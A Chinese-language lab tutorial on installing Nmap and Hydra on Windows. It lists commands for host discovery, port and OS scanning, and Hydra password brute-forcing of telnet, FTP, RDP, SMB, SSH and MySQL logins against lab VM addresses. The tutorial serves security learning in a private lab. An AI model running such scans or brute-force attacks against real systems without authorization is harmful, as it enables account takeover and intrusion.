Window版NMAP扫描工具和Hydra爆破工具安装及简单指令使用
Window版NMAP 下载NMAP网站最新版,安装完成后可以CMD进行控制。
背景:在Window系统中使用NMAP和Hydra工具进行目录扫描
将网络配置使用VMnet2,手动配置IP地址;
真实机IP:10.1.1.1 /24
虚拟机Win2003服务器IP:10.1.1.2 /24
主机探测与端口扫描:
主机测探是指确定目标主机是否存活。
端口扫描就是寻找在线主机所开放的端口,并且在端口上所运行的服务。甚至可以进一步确定目标主机操作系统类型和更详细的信息
-基础知识
@ 常见端口号
| 21 |
FTP |
443 |
HTTPS |
| 22 |
SSH |
1433 |
SQL Server |
| 23 |
Telnet |
1521 |
Oracle |
| 25 |
SMTP |
3306 |
MySQL |
| 80 |
HTTP |
3389 |
RDP |
Nmap重要常用参数
| -sP |
ping 扫描 |
| -p |
指定端口范围 |
| -sV |
服务版本探测 |
| -O(大写) |
启用操作系统探测 |
| -A |
全面扫描 |
| -oN |
保存txt |
Nmap -sP 10.1.1.1/24 扫描10.1.1.0整个网段,哪些主机在线;
Nmap -p 21,23-25,3389 10.1.1.1 指定端口信息;
Nmap -p 21,23 10.1.1.1 -sV 扫描指定端口的服务版本;
Nmap -A 10.1.1.1 全面扫描
Nmap -O (大写) 10.1.1.1 扫描目标系统版本,也有开发端口的一些情况;
Namp -p 21,23 10.1.1.1 -oN e:result.txt
九头蛇Hydra window版安装:Hydra Window版下载
使用教程:
将压缩包解压至文件夹;
利用CMD cd命令进入文件夹内
之后就可以使用Hydra相关命令进行控制;
在d:根目录下创建pass.txt文件,其中写几个密码,包括开机密码123.com,FTP密码a;
在cmd中输入
D:Securitytoolsthc-hydra-windows-master>hydra.exe -l administrator -P d:pass.txt 10.1.1.2 telnet
同样也可以使用用户名字典文件进行用户名爆破;
D:Securitytoolsthc-hydra-windows-master>hydra.exe -L d:user.txt -P d:pass.txt 10.1.1.2 ftp
Hydra -l a -p 123 10.1.1.1 telnet
Hydra -l a -P e:pass.txt 10.1.1.1 telnet
Hydra -l a -P e:pass.txt 10.1.1.1 rdp(远程桌面服务,3389)
Hydra -l a -P e:pass.txt 10.1.1.1 smb(共享服务,445)
Hydra -l a -P e:pass.txt 10.1.1.1 ftp
Hydra -l a -P e:pass.txt 10.1.1.1 ssh
Hydra -l a -P e:pass.txt 10.1.1.1 mysql
Hydra -L e:user.txt -P e:pass.txt 10.1.1.1 telnet